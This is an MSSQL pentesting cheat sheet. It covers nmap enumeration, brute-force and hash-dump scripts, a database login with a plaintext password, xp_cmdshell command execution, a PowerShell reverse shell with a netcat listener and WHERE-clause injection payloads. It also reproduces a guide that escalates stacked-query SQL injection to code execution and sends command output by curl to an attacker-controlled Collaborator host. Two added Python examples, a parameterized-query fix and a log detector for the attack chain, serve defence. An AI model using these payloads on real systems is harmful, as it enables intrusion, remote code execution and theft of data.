
1433 - Pentesting mssql

MS SQL, or Microsoft SQL Server, is a relational database management system (RDBMS) developed by Microsoft. It is a popular database system used for storing and retrieving data for a wide range of applications, including web-based applications, data warehousing, and business intelligence.

nmap


sudo nmap -p 1433 -Pn -sC -sV -vv $IP
|->
1433/tcp  Microsoft SQL Server 2019 15.00.2000.00; RTM
sudo nmap --script ms-sql-info -p 1433 $IP
sudo nmap --script ms-sql-empty-password -p 1433 $IP
sudo nmap --script ms-sql-ntlm-info -p 1433 $IP
sudo nmap --script ms-sql-dac -p 1433 $IP
sudo nmap --script ms-sql-dump-hashes -p 1433 $IP
ls -la /usr/share/nmap/scripts/ms-sql-*
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $IP
sudo nmap -p 1433 --script ms-sql-brute --script-args userdb=user.txt,passdb=pass.txt $IP

connect with mssqlclient.py


mssqlclient.py

/opt/tools/impacket/examples/mssqlclient.py -port 1433 netdb:'D@ta_bAse_adm1n!'@172.16.7.60

command execution


SQL>enable_xp_cmdshell
SQL>xp_cmdshell whoami
SQL>xp_cmdshell dir
SQL>xp_cmdshell powershell -c "ls"
rev-shell
SQL>xp_cmdshell powershell -e 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

#https://www.revshells.com/ -> PowerShell #3 (Base64)
nc -lnvp 4444

bypass sql where clause


query

Select * from users WHERE user_id = 1 AND {USER_PAYLOAD} AND user_type = 'not_admin';
bypass examples
1=1 OR 1=1 -- lorem
'1'='1' OR '1'='1' -- lorem
2>1 OR 2>1 -- lorem
1=1); select * from users; -- lorem
'1'='1'); select * from users; -- lorem
2>1); select * from users; -- lorem
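The vulnerable pattern above next to its parameterized fix, as an added example that is not part of these notes. It uses an in-memory sqlite3 table as a stand-in for the MSSQL `users` table (an assumption made so it runs offline) and feeds it the first payload from the list; the hardened form binds values instead of accepting a free-form expression, which is the mitigation.

```python
import sqlite3

# Constructed stand-in for the "users" table in the query above. sqlite3 is used only so
# the example runs offline; the WHERE-clause payloads behave the same way in T-SQL.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, username TEXT, user_type TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "not_admin"), (2, "root", "admin")])
    return conn

def lookup_vulnerable(conn, user_id, extra):
    """Vulnerable form: caller-controlled text is spliced into the WHERE clause, like the
    {USER_PAYLOAD} slot above. A payload can comment out the trailing user_type filter."""
    sql = ("SELECT user_id, username, user_type FROM users "
           f"WHERE user_id = {int(user_id)} AND {extra} AND user_type = 'not_admin'")
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, user_id, username):
    """Hardened form: no free-form expression is accepted. Both inputs are bound
    parameters, so a payload is compared as a literal username and matches nothing."""
    sql = ("SELECT user_id, username, user_type FROM users "
           "WHERE user_id = ? AND username = ? AND user_type = 'not_admin'")
    return conn.execute(sql, (int(user_id), username)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, 1, "1=1 OR 1=1 -- lorem"))        # admin row leaks
    print(lookup_hardened(db, 1, "alice' OR '1'='1' -- lorem"))   # []
```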

useful queries


version

SELECT @@version
information about the database
SELECT * FROM INFORMATION_SCHEMA.TABLES
databases
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), name), ',') from master.dbo.sysdatabases) 
tables
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), TABLE_NAME), ',') from INFORMATION_SCHEMA.COLUMNS)
columns
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), COLUMN_NAME), ',') from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users') 
select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'
routines
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), ROUTINE_NAME), ',') from INFORMATION_SCHEMA.ROUTINES)
functions
(Select APP_NAME())
(Select DB_ID())
(Select DB_NAME())
(Select ORIGINAL_DB_NAME())
(Select SCHEMA_ID())
(Select SCHEMA_NAME()) 
(Select SCOPE_IDENTITY())  
(Select @@VERSION)
(Select SERVERPROPERTY('BuildClrVersion'))
(Select SERVERPROPERTY('Collation'))  
(Select SERVERPROPERTY('CollationID'))  
(Select SERVERPROPERTY('ComparisonStyle'))  
(Select SERVERPROPERTY('ComputerNamePhysicalNetBIOS'))  
(Select SERVERPROPERTY('Edition'))  
(Select SERVERPROPERTY('EditionID'))  
(Select SERVERPROPERTY('EngineEdition'))  
(Select SERVERPROPERTY('FilestreamConfiguredLevel'))  
(Select SERVERPROPERTY('FilestreamEffectiveLevel'))  
(Select SERVERPROPERTY('FilestreamShareName'))  
(Select SERVERPROPERTY('HadrManagerStatus'))  
(Select SERVERPROPERTY('InstanceDefaultBackupPath'))  
(Select SERVERPROPERTY('InstanceDefaultDataPath'))  
(Select SERVERPROPERTY('InstanceDefaultLogPath'))  
(Select SERVERPROPERTY('InstanceName'))  
(Select SERVERPROPERTY('IsAdvancedAnalyticsInstalled'))  
(Select SERVERPROPERTY('IsBigDataCluster'))  
(Select SERVERPROPERTY('IsClustered'))  
(Select SERVERPROPERTY('IsExternalAuthenticationOnly'))  
(Select SERVERPROPERTY('IsFullTextInstalled'))  
(Select SERVERPROPERTY('IsHadrEnabled'))  
(Select SERVERPROPERTY('IsIntegratedSecurityOnly'))  
(Select SERVERPROPERTY('IsLocalDB'))  
(Select SERVERPROPERTY('IsPolyBaseInstalled'))  
(Select SERVERPROPERTY('IsServerSuspendedForSnapshotBackup'))  
(Select SERVERPROPERTY('IsSingleUser'))  
(Select SERVERPROPERTY('IsTempDbMetadataMemoryOptimized'))  
(Select SERVERPROPERTY('IsXTPSupported'))  
(Select SERVERPROPERTY('LCID'))  
(Select SERVERPROPERTY('LicenseType'))  
(Select SERVERPROPERTY('MachineName'))  
(Select SERVERPROPERTY('NumLicenses'))  
(Select SERVERPROPERTY('PathSeparator'))  
(Select SERVERPROPERTY('ProcessID'))  
(Select SERVERPROPERTY('ProductBuild'))  
(Select SERVERPROPERTY('ProductBuildType'))  
(Select SERVERPROPERTY('ProductLevel'))  
(Select SERVERPROPERTY('ProductMajorVersion'))  
(Select SERVERPROPERTY('ProductMinorVersion'))  
(Select SERVERPROPERTY('ProductUpdateLevel'))  
(Select SERVERPROPERTY('ProductUpdateReference'))  
(Select SERVERPROPERTY('ProductVersion'))  
(Select SERVERPROPERTY('ResourceLastUpdateDateTime'))  
(Select SERVERPROPERTY('ResourceVersion'))  
(Select SERVERPROPERTY('ServerName'))  
(Select SERVERPROPERTY('SqlCharSet'))  
(Select SERVERPROPERTY('SqlCharSetName'))  
(Select SERVERPROPERTY('SqlSortOrder'))  
(Select SERVERPROPERTY('SqlSortOrderName'))  
(Select SERVERPROPERTY('SuspendedDatabaseCount'))

RCE


https://blooserpent.medium.com/mssql-injection-to-rce-guide-read-output-of-xp-cmdshell-b8216857c36

# MSSQL Injection to RCE Guide: Read Output of xp_cmdshell

Unlike MySQL, MSSQL offers `xp_cmdshell`, which allows us to execute system commands.

> **HINT**
> 
> In **xp_cmdshell**, most of the time we are privileged to use **cmd** and, most importantly, **powershell**. Now, we will use **curl** in powershell to send command outputs to our controlled server.

What we need:  
> MSSQL Injection Vuln Site  
> BurpSuite Collaborator or Ngrok

# Check if we can stack queries

For example, we built our injection query like this:

`123' UNION SELECT 1,2,3,4,5-- -`

Now let’s check if we can do [stacked queries](https://www.sqlinjection.net/stacked-queries/)

`123' UNION SELECT 1,2,3,4,5; WAITFOR DELAY '0:0:8'-- -`

If it `sleeps` for 8 seconds, we can proceed to the next step.

# **Checking Privileges**

If we can do stacked queries, let's check if we can use `xp_cmdshell`. The paragraph below is from [A Not-So-Blind RCE with SQL Injection](https://medium.com/@notsoshant/a-not-so-blind-rce-with-sql-injection-13838026331e) by [@notsoshant](http://twitter.com/notsoshant)

> The next step here is to check if the DB user is a `sysadmin` or not, since only `sysadmin` can enable `xp_cmdshell` and execute OS level commands, which is our ultimate goal here.
> 
> Here I would like to introduce an [awesome SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) that I use. It is from pentestmonkey. Looking at this cheat sheet, we find that we can use `SELECT is_srvrolemember('sysadmin')` query to figure out if our current DB user is `sysadmin` or not. Let's try that:

![](https://miro.medium.com/v2/resize:fit:700/0*ht85RT3S3FMN9ryg.png)

> Since we get a `1` in the response, we can confirm that the current DB user is indeed a `sysadmin`.

`123' UNION SELECT 1,is_srvrolemember('sysadmin'),3,4,5-- -`

If your response returned `1`, then do the following after:

123' UNION SELECT 1,2,3,4,5; EXEC sp_configure 'show advanced options', 1-- -
123' UNION SELECT 1,2,3,4,5; RECONFIGURE-- -
123' UNION SELECT 1,2,3,4,5; EXEC sp_configure 'xp_cmdshell', 1-- -
123' UNION SELECT 1,2,3,4,5; RECONFIGURE-- -

After these, test whether we can execute commands using xp_cmdshell.

First, start a new **BurpCollaborator Client**. This is only available in the paid BurpSuite. If you don't have one, just use `ngrok` as an alternative.

![](https://miro.medium.com/v2/resize:fit:700/1*yjx3gs6AL01sB_rbWb0fKg.png)

Copy your own burp collaborator link. This varies person-to-person. Mine is `v626e8p83z8d7o1zsklzm2716sci07.burpcollaborator.net`

Then `ping` our burpcollab client

123' UNION SELECT 1,2,3,4,5; EXEC xp_cmdshell 'ping v626e8p83z8d7o1zsklzm2716sci07.burpcollaborator.net'-- -

If the server is executing our commands, we must see an interaction back at our burpcollaborator.

**BOOM!** We got a DNS Interaction. This confirms that our commands are really executed.

# Reading the Command Output

Here is an explanation of the query below. In `powershell`, we can assign variables with `$var`. I used this to assign the output of our command to a variable. After assigning the variable, I `concatenated` it with our burp collaborator link. With the help of `curl`, this results in an HTTP request to `http://YOURBURPCOLLAB.burpcollaborator.net/get?output=OUTPUT OF COMMAND`

123' UNION SELECT 1,2,3,4,5; EXEC xp_cmdshell 'powershell -c "$x = whoami; curl http://YOURBURPCOLLAB.burpcollaborator.net/get?output=$x" '-- -

_Just change_ `whoami` _to any other command you want_

We must see a new HTTP Interaction with the command output in the GET Parameter
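Detection logic for the chain described above, as an added example that is not from the article. It scans constructed records in a simplified `ts login=X statement=Y` format (an assumption for this example, not the real SQL Server Audit schema) for the stacked `WAITFOR` probe, the `is_srvrolemember('sysadmin')` check, `xp_cmdshell` enablement via `sp_configure`, and command execution with an outbound request, then reports which logins completed the enable-then-execute chain.

```python
import re

# Indicators mapped to the steps of the guide above: stacked time-based probe, sysadmin
# check, xp_cmdshell enablement via sp_configure, and OS command execution with exfil.
INDICATORS = {
    "stacked_waitfor": re.compile(r";\s*WAITFOR\s+DELAY\s+'", re.I),
    "sysadmin_check": re.compile(r"is_srvrolemember\s*\(\s*'sysadmin'\s*\)", re.I),
    "enable_xp_cmdshell": re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I),
    "xp_cmdshell_exec": re.compile(r"\bxp_cmdshell\s+'", re.I),
    "outbound_exfil": re.compile(r"\b(curl|ping|Invoke-WebRequest)\s+\S*[\w-]+\.[a-z]{2,}", re.I),
}
# Enablement followed by execution from the same login is the signal worth paging on.
RCE_CHAIN = {"enable_xp_cmdshell", "xp_cmdshell_exec"}

# Constructed records in a simplified "ts login=X statement=Y" format (an assumption
# made for this example; real SQL Server Audit output has more fields).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z login=webapp statement=SELECT name FROM products WHERE id = 123
2024-05-01T10:00:07Z login=webapp statement=SELECT name FROM products WHERE id = '123' UNION SELECT 1,2,3,4,5; WAITFOR DELAY '0:0:8'-- -'
2024-05-01T10:00:21Z login=webapp statement=SELECT name FROM products WHERE id = '123' UNION SELECT 1,is_srvrolemember('sysadmin'),3,4,5-- -'
2024-05-01T10:00:35Z login=webapp statement=SELECT name FROM products WHERE id = '123' UNION SELECT 1,2,3,4,5; EXEC sp_configure 'xp_cmdshell', 1-- -'
2024-05-01T10:00:50Z login=webapp statement=SELECT name FROM products WHERE id = '123' UNION SELECT 1,2,3,4,5; EXEC xp_cmdshell 'powershell -c "$x = whoami; curl http://collab.example/get?output=$x"'-- -'
2024-05-01T10:01:02Z login=reports statement=SELECT COUNT(*) FROM orders WHERE status = 'shipped'
"""

def scan_statement(stmt):
    """Names of the indicators matching one SQL statement, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(stmt)]

def scan_log(text):
    """Parse the records and return (timestamp, login, hits) for every flagged line."""
    flagged = []
    for line in text.splitlines():
        head, sep, stmt = line.partition(" statement=")
        if not sep:
            continue  # malformed record for this format; skip rather than guess
        ts, _, login_field = head.partition(" ")
        login = login_field.split("=", 1)[-1]
        hits = scan_statement(stmt)
        if hits:
            flagged.append((ts, login, hits))
    return flagged

def logins_with_rce_chain(flagged):
    """Logins whose flagged statements together cover every indicator in RCE_CHAIN."""
    seen = {}
    for _, login, hits in flagged:
        seen.setdefault(login, set()).update(hits)
    return {login for login, hits in seen.items() if RCE_CHAIN <= hits}
```

In a real deployment the same patterns would be applied to SQL Server Audit or Extended Events `statement` fields, and the `sys.configurations` row for `xp_cmdshell` should be checked alongside.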